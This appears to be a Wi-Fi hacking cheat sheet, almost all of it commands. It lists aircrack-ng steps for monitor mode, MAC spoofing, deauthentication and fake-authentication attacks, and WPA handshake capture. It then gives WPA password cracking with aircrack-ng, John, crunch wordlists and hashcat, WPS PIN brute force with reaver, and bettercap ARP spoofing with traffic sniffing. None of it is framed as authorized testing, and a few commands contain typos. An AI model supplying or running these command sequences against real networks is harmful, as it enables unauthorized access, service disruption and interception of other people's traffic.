Wifi Hacking

Commands
Network Manager Commands
Network Adapter Testing Commands
Changing MAC Address
Sniff Network
Capture Data
Analyse Data
Associate with Router
DE-Authentication Attack
Fake-Authentication Attack
WPA Handshake Capture
Password Cracking Using John
Password Cracking using wordlist
Create word list
Password Cracking Without Word list

---

Network Manager commands

Kill Network Manager

airmon-ng check kill

Enable Network Manager

service NetworkManager start

Restart Network Manager

systemctl restart NetworkManager

Check Status of Network Manager

systemctl status NetworkManager

---

Network Adapter Testing Commands

Enable Monitor Mode

airmon-ng start wlan1

Disable Monitor Mode

airmon-ng stop wlan1

Packet Injection test

aireplay-ng --test wlan1

Access Point Creation test

you can put any fake MAC Address like this 00:01:02:03:04:05

airbase-ng -a 00:01:02:03:04:05 --essid "<AP_name>" -c {channel_no.} wlan1

---

Changing MAC Address

ifconfig wlan1 down
ifconfig wlan1 hw ether 00:11:22:33:44:55
ifconfig wlan1 up

Sniff Network

Sniff Network around 2.4 GHz

airodump-ng wlan1

Sniff Network Both 2.4 GHz and 5 GHz

airodump-ng --band a wlan1

Capture data both 2.4 GHz and 5 GHz

airodump-ng --band abg wlan1

---

Capture Data

airodump-ng --bssid {router_MAC_add} --channel {channel_no.} --write (file_name_without_extension) wlan1

Analyse Data

wireshark

---

Associate with router

aireplay-ng --fakeauth 0 -a {router_MAC_add} -h {Your_NIC_MAC_add} waln1

DE-Authentication Attack

aireplay-ng --deauth {no_of_deauth_packets} -a {router_MAC_add} -c {target_MAC_add} wlan1

if it`s fails then, target router on specfic channel

airodump-ng --bssid {router_MAC_add} --channel {channel_no.} wlan1

Fake-Authentication Attack

aireplay-ng --fakeauth {delay} -a {router_MAC_add} -h {your_NIC_MAC} wlan1

WPA Handshake Capture

airodump-ng --bssid {router_MAc_add} --channel {channel_no.} --write {file_name_without_extn} wlan1

Password Cracking Using John

.cap to .hccap

aircrack-ng {.cap} -J {extension_name_not_required}

.hccap to .txt

hccap2john {.hccap} > {.txt}

Crack Password

john {.txt}

---

Password Cracking using wordlist

aircrack-ng {.cap} -w {Wordlist.txt}

---

create word list

man crunch
crunch 6 8 {key length} abc12 {char used} -o test.txt

Create word list using pattern

crunch {key_length Ex: 6 8} {char_used Ex: abc12} -o {.txt} -t {patter Ex: a@@@@b}

---

Password Cracking Without Word list

Scan WPS Enable Network Around us

wash --interface wlan1

Warning

Current version of reaver have some bugs, you can use old version

Brute force the pin attack

reaver --bssid {router_MAC_add} --channel {channel_no.} --interface wlan1 -vvv --no-associate 

---

---

---

Bettercap

sudo bettercap -iface wlx242fd0da04dc

set arp.spoof.fullduplex true

net.show

set arp.spoof.targets <target_ip>

arp.spoof on

for scan target browsed

net.sniff on 

Password Cracking Using Hashcat

sudo airmon-ng check kill

sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service

sudo ip link set wlan1 down
sudo iw dev wlan1 set type monitor
sudo ip link set wlan1 u

sudo hcxdumptool -i wlan1 -w dumpfile.pcapng

hcxpcapngtool -o hash.hc22000 -E <essid> essidlist dumpfile.pcapng

hashcat -a 0 -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt -D 2

hashcat -m 22000 hash.hc22000 wordlist.txt

sudo systemctl start wpa_supplicant.service
sudo systemctl start NetworkManager.service

=}> Keep Supporting me on YouTube